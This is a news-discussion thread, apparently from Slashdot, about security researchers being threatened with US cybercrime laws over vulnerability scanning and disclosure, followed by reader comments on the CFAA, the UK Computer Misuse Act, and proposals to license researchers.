Security Researchers Threatened With US Cybercrime Laws 156
An anonymous reader writes "The Guardian reports that many of the security industry's top researchers are being threatened by lawyers and law enforcement over their efforts to track down vulnerabilities in internet infrastructure. 'HD Moore, creator of the ethical hacking tool Metasploit and chief research officer of security consultancy Rapid7, told the Guardian he had been warned by U.S. law enforcement last year over a scanning project called Critical.IO, which he started in 2012. The initiative sought to find widespread vulnerabilities using automated computer programs to uncover the weaknesses across the entire internet. ... Zach Lanier, senior security researcher at Duo Security, said many of his team had "run into possible CFAA issues before in the course of research over the last decade." Lanier said that after finding severe vulnerabilities in an unnamed "embedded device marketed towards children" and reporting them to the manufacturer, he received calls from lawyers threatening him with action."
This is what happens... (Score:5, Insightful)
...when ill thought out laws are passed.
In the UK, it is a crime (under the computer misuse act) to test a 3rd party system for vulnerabilities.
The Heartbleed incident caused a lot of people to break the law testing whether websites were affected.
NSA (Score:5, Insightful)
The NSA and other security services will not want security researchers to find and fix vulnerabilities the security services are exploiting.
Re:OK, Whatever... (Score:5, Insightful)
Re:This is what happens... (Score:5, Insightful)
When your infrastructure spams me, or get zombied into DDoSing me, you will be held responsible for spamming and DDoSing me.
Now, would you like to reconsider your position?
Re:This is what happens... (Score:5, Insightful)
So security researchers and/or security reporters in the UK cannot warn about a lot of unpatched webpages in the UK, but hackers all over the globe can hack and abuse them.
Yeah, makes a damn lot of sense.
Re:See... (Score:2, Insightful)
I would say that this is more like:
You leave your credit card on a table under a wet napkin. I look at the napkin and think I can read the number. I look closer and can indeed read the number and exp date. I tell you that your credit card is easily readable, and you should probably do something about it. You then report me to the police for stealing your credit card number.
Re:As it should be (Score:4, Insightful)
Now try to explain why it was A-OK for the border patrol to kill the people trying to flee from East Germany because it was the law.
Re:OK, Whatever... (Score:5, Insightful)
Re:OK, Whatever... (Score:4, Insightful)
For example, a SCADA system that your organization maintains got compromised. Fixing such system vulnerability will be inevitably expensive, and simply sending out a technician to reset it would generate billable hours. Your business interest are to ignore this problem, but imagine if this system is part of water treatment system for large residential neighborhood.
Business needs worship is a flavor of 'market will fix it' fallacy. It only works if all players are forced into making moral decisions.
Re:OK, Whatever... (Score:5, Insightful)
They're very effective. To paraphrase Futurama:
Documentary Narrator: Fortunately, our most expensive lawyers sued the security researchers and shut them up. Of course, the security holes are still there, we just sue anyone who talks about them. Thus solving the problem once and for all.
Suzie: But...
Documentary Narrator: Once and for all!
Sadly, too many companies don't see this as a joke, but as a valid security vulnerability response strategy.
License researchers like investigators (Score:4, Insightful)
I work for a company that does a lot of forensics work, including collections activities and incident response. The company has to be licensed as a "private investigator" in all of the states that our employees do collections in.
It seems like a similar licensing regime would be a good place to start for computer security researchers.
It might also be worth considering making the researchers or their employer carry a bond as collateral against any potential damage that they might inadvertently cause.
It has been my experience that when people and organizations have something to lose (like forfeiture of a bond or loss of a license / ability to do business), they tend to act in a more predictable manner, and within well established guidelines.
There might also be some lessons to be learned from maritime law. In a way, researchers are sort of like privateers on the digital oceans. (So yes, once again, pirates ARE better than ninjas. Just in case there was ever any doubt.)
Re: See... (Score:5, Insightful)
That's a really bad analogy.
It is. It's more like the wet napkin has retained an imprint of the credit card and you have left the napkin behind on the bar. Someone then takes the napkin, hands it to you and says "you want to be careful with these wet napkins, look". You call the police because someone you don't know has your credit card details.